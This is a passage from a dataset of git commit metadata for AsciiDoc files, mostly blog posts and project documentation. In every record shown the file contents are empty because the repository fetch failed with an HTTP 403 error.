2017-09-01-Welcome-friends.adoc","repos":"rishipatel\/rishipatel.github.io,rishipatel\/rishipatel.github.io,rishipatel\/rishipatel.github.io,rishipatel\/rishipatel.github.io","old_file":"_posts\/2017-09-01-Welcome-friends.adoc","new_file":"_posts\/2017-09-01-Welcome-friends.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rishipatel\/rishipatel.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c4b773ce8ee28b521e932055319065fde5aae1b","subject":"Update 2018-05-28-Swift-Firestore.adoc","message":"Update 2018-05-28-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_file":"_posts\/2018-05-28-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a2899957ddc4dd26b109024a9b281c6575511be6","subject":"Update 2017-04-14-First-things-first.adoc","message":"Update 2017-04-14-First-things-first.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-04-14-First-things-first.adoc","new_file":"_posts\/2017-04-14-First-things-first.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f88d2f83adc37a6f2a5072cfaf1205b1ca8f7f9","subject":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","message":"Update 2017-03-03-mark-read-all-by-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_file":"_posts\/2017-03-03-mark-read-all-by-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0039ff0a858bec234d60b2b180e40e2e47f5a720","subject":"Add readme file.","message":"Add readme file.\n","repos":"hoadlck\/dda,hoadlck\/dda","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoadlck\/dda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"269273c3c8bfa05e7a3ce9115f2b063c5024f8af","subject":"Blog: Distributed tracing workshop and OTSC (#284)","message":"Blog: Distributed tracing workshop and OTSC (#284)\n\n* Blog: Distributed tracing workshop and OTSC\r\n\r\n* readable link to ot\/spec PR\r\n\r\n* Corrected typos\r\n\r\n* Agenda, OTSC more info\r\n\r\n* OTSC in full form\r\n","repos":"objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/03\/15\/hawkular-opentracing-otsc.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/03\/15\/hawkular-opentracing-otsc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23c77585d4b083220ff116df56988f344b9bfdd4","subject":"add news about WildFly 11 messaging features","message":"add news about WildFly 11 messaging features\n","repos":"stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,ctomc\/wildfly.org","old_file":"news\/2017-10-03-Messaging-features.adoc","new_file":"news\/2017-10-03-Messaging-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stuartwdouglas\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"355dbd84a35e44110f81a923fee53e0d75a9fdfb","subject":"Update 2015-11-01-Enlaces-Utiles-Sysadmin.adoc","message":"Update 2015-11-01-Enlaces-Utiles-Sysadmin.adoc","repos":"jelitox\/jelitox.github.io,jelitox\/jelitox.github.io,jelitox\/jelitox.github.io","old_file":"_posts\/2015-11-01-Enlaces-Utiles-Sysadmin.adoc","new_file":"_posts\/2015-11-01-Enlaces-Utiles-Sysadmin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jelitox\/jelitox.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0cf3d77ef7cc5b0e2223cbafba105511cbfe5920","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9eac9429191de91d49df79c9c0c6dd05b89b6002","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e818469ed135a1234cae0ba1b6fe353304e5d5fa","subject":"Update 2016-10-17-Stacks-Queues-and-Shunting-Yards.adoc","message":"Update 2016-10-17-Stacks-Queues-and-Shunting-Yards.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-17-Stacks-Queues-and-Shunting-Yards.adoc","new_file":"_posts\/2016-10-17-Stacks-Queues-and-Shunting-Yards.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b56bfd67fd1bfe2d80f22773b6614703999e4d6","subject":"y2b create post The Coolest Padlock In The World!","message":"y2b create post The Coolest Padlock In The World!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-07-The-Coolest-Padlock-In-The-World.adoc","new_file":"_posts\/2017-07-07-The-Coolest-Padlock-In-The-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70132d4bfd1273d6e6bf0f8d05aa67653a161f87","subject":"y2b create post Room Tour \\u0026 Gaming Setup?","message":"y2b create post Room Tour \\u0026 Gaming Setup?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-20-Room-Tour-u0026-Gaming-Setup.adoc","new_file":"_posts\/2011-12-20-Room-Tour-u0026-Gaming-Setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a5ca54e3248a5195b56c61a3b14b3d2e8c74dad","subject":"Update 2015-06-03-RIP-Postachio-and-Cilantroio.adoc","message":"Update 2015-06-03-RIP-Postachio-and-Cilantroio.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-03-RIP-Postachio-and-Cilantroio.adoc","new_file":"_posts\/2015-06-03-RIP-Postachio-and-Cilantroio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a65014e93c410beb691a422de4ce72651058b24","subject":"y2b create post Limited Edition Oppo R7 Plus","message":"y2b create post Limited Edition Oppo R7 Plus","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-10-17-Limited-Edition-Oppo-R7-Plus.adoc","new_file":"_posts\/2015-10-17-Limited-Edition-Oppo-R7-Plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a559187cca7eb4c816248c472f02d38e068476a7","subject":"Update 2017-12-03-Visual-studio-code-extension.adoc","message":"Update 2017-12-03-Visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-Visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-Visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ced0d99985b55275d92c2a7bb09e319964927c10","subject":"Update 2013-04-24-yahoomail-gmail-user-experience.adoc","message":"Update 2013-04-24-yahoomail-gmail-user-experience.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2013-04-24-yahoomail-gmail-user-experience.adoc","new_file":"_posts\/2013-04-24-yahoomail-gmail-user-experience.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ac58270d65488dd3cc6b31e864a03dd0c5bf656","subject":"y2b create post Unboxing The World's Smallest Phone","message":"y2b create post Unboxing The World's Smallest Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-06-Unboxing%20The%20World's%20Smallest%20Phone.adoc","new_file":"_posts\/2018-01-06-Unboxing%20The%20World's%20Smallest%20Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"071468284bb1e2885743f845446ee9ced347b5a8","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a72a97fa600c227db7b8499d1b4a7bc6d5d2d840","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bf628fc4f100ceecc10a12a683a33beaedb738d","subject":"Update 2016-10-06-Blockchain-for-healthcare-industry.adoc","message":"Update 2016-10-06-Blockchain-for-healthcare-industry.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-06-Blockchain-for-healthcare-industry.adoc","new_file":"_posts\/2016-10-06-Blockchain-for-healthcare-industry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"560a17a72305c416bd7b4f0020c6c64ac76d51b9","subject":"Worked on IIS log file documentation","message":"Worked on IIS log file documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/Microsoft IIS W3C extended log file format.asciidoc","new_file":"documentation\/Microsoft IIS W3C extended log file format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e7c7d4a1203d4869713ec2d912dadb3f43c60bdb","subject":"[docs] Improvements to multi-master migration doc","message":"[docs] Improvements to multi-master migration doc\n\n- Add extra reminder to run as the Kudu user.\n\n- Note that the copy_from_remote command requires authenticating\n to the remote service as the Kudu user.\n\n- Note that the workflow can be used to migrate 2->3 masters by\n making straightforward adjustments to the procedure.\n\n- Move steps for verifying the migration was successful to a new\n section so they are more noticeable.\n\nChange-Id: I77ef796f8b35729871ef8ddf2b635989278c2ebc\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9466\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8af997aa4c87c38958e3bb19fdfd3dcbeaea267","subject":"Fixes #1002 add snippet on hot reload","message":"Fixes #1002 add snippet on hot reload\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/topics\/live-coding.adoc","new_file":"docs\/src\/main\/asciidoc\/topics\/live-coding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2580133071a1ed20794033bdf56a28f87240e923","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdf763746c18a8d60375b5ac84f7650a4a2e9d3d","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a72c322bb6265c7987d0475cb50313370749f79f","subject":"Add examples for quote macro","message":"Add examples for quote macro\n","repos":"jxxcarlson\/asciidoctor-latex,asciidoctor\/asciidoctor-latex,asciidoctor\/asciidoctor-latex,jxxcarlson\/asciidoctor-latex,jxxcarlson\/asciidoctor-latex,asciidoctor\/asciidoctor-latex","old_file":"try-out\/quote.adoc","new_file":"try-out\/quote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/asciidoctor-latex.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3968597cda53e1f1c431490a93d4a8b0e9d97bcd","subject":"Update 2009-12-20-Miles-Davis-The-Original-Scrum-Master.adoc","message":"Update 2009-12-20-Miles-Davis-The-Original-Scrum-Master.adoc","repos":"bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bigkahuna1uk\/bigkahuna1uk.github.io","old_file":"_posts\/2009-12-20-Miles-Davis-The-Original-Scrum-Master.adoc","new_file":"_posts\/2009-12-20-Miles-Davis-The-Original-Scrum-Master.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bigkahuna1uk\/bigkahuna1uk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e387b90c798cfcf6b0fae7e292fc6caf722ac716","subject":"y2b create post Unboxing Every iPhone 7 \\u0026 iPhone 7 Plus","message":"y2b create post Unboxing Every iPhone 7 \\u0026 iPhone 7 Plus","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-18-Unboxing-Every-iPhone-7-u0026-iPhone-7-Plus.adoc","new_file":"_posts\/2016-09-18-Unboxing-Every-iPhone-7-u0026-iPhone-7-Plus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f86f54103be3668a19abee518eee01f6d023ed5a","subject":"y2b create post THE CRAZIEST HEADPHONES EVER","message":"y2b create post THE CRAZIEST HEADPHONES EVER","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-21-THE%20CRAZIEST%20HEADPHONES%20EVER.adoc","new_file":"_posts\/2017-12-21-THE%20CRAZIEST%20HEADPHONES%20EVER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e7749c686fcf6f1f14f6a18d3e924f5d2ab3bf1","subject":"Very initial Yesod for Haskellers","message":"Very initial Yesod for Haskellers\n","repos":"mlitchard\/lambdaweb.com-content,wolftune\/yesodweb.com-content,maxigit\/yesodweb.com-content,maxigit\/yesodweb.com-content,wolftune\/yesodweb.com-content","old_file":"book\/yesod-for-haskellers.asciidoc","new_file":"book\/yesod-for-haskellers.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wolftune\/yesodweb.com-content.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"109f65c6792391664f45df796d57b56e9270de21","subject":"Update 2015-03-27-Who-using-HubPress-in-Japan.adoc","message":"Update 2015-03-27-Who-using-HubPress-in-Japan.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2015-03-27-Who-using-HubPress-in-Japan.adoc","new_file":"_posts\/2015-03-27-Who-using-HubPress-in-Japan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"497c7c00eb1db17893087135bd1be925cc74ee1e","subject":"y2b create post World's Thinnest Phone! (Oppo R5 Unboxing)","message":"y2b create post World's Thinnest Phone! (Oppo R5 Unboxing)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-12-27-Worlds-Thinnest-Phone-Oppo-R5-Unboxing.adoc","new_file":"_posts\/2014-12-27-Worlds-Thinnest-Phone-Oppo-R5-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"62412fa6332a378007d77d6a732b69b0df97a0b5","subject":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","message":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8d4b361c3a01b8bcf3db141e19f4e791ffa3a61d","subject":"Update 2016-05-08-Stop-Configuring-in-Chef-Compile-Phase.adoc","message":"Update 2016-05-08-Stop-Configuring-in-Chef-Compile-Phase.adoc","repos":"amberry\/blog,amberry\/blog,amberry\/blog,amberry\/blog","old_file":"_posts\/2016-05-08-Stop-Configuring-in-Chef-Compile-Phase.adoc","new_file":"_posts\/2016-05-08-Stop-Configuring-in-Chef-Compile-Phase.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/amberry\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59d6d8be0635f82502b1fc5e943cb2bc74f26bc1","subject":"Add initial application health docs","message":"Add initial application health docs\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_openshift\/application_health.adoc","new_file":"using_openshift\/application_health.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"310f22367f2a2d520a5190cf511a0649796d2503","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administtrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a77a34dbd03865fb787b396d2852516d41106dc4","subject":"OGM-873 Documentation","message":"OGM-873 Documentation\n","repos":"DavideD\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm-cassandra,DavideD\/hibernate-ogm-cassandra,hibernate\/hibernate-ogm,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,hibernate\/hibernate-ogm,Sanne\/hibernate-ogm,hibernate\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib,gunnarmorling\/hibernate-ogm,DavideD\/hibernate-ogm,schernolyas\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,DavideD\/hibernate-ogm,Sanne\/hibernate-ogm,mp911de\/hibernate-ogm,gunnarmorling\/hibernate-ogm,schernolyas\/hibernate-ogm,DavideD\/hibernate-ogm-contrib","old_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/redis.asciidoc","new_file":"documentation\/manual\/src\/main\/asciidoc\/en-US\/modules\/redis.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DavideD\/hibernate-ogm-contrib.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"bbc944882676f4b02aad43c239ee637d360ebfcf","subject":"Update 2018-07-28-the-one-true-thing.adoc","message":"Update 2018-07-28-the-one-true-thing.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-07-28-the-one-true-thing.adoc","new_file":"_posts\/2018-07-28-the-one-true-thing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8edac11911e6e8d7e35ea3d9f8fcc625a184990","subject":"android blog contribution","message":"android blog contribution\n","repos":"droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"blog\/2015-05-17-OptaPlannerOnAndroid.adoc","new_file":"blog\/2015-05-17-OptaPlannerOnAndroid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96334a4e881e09173c8455dee354d13dd08daa69","subject":"add mso4sc","message":"add 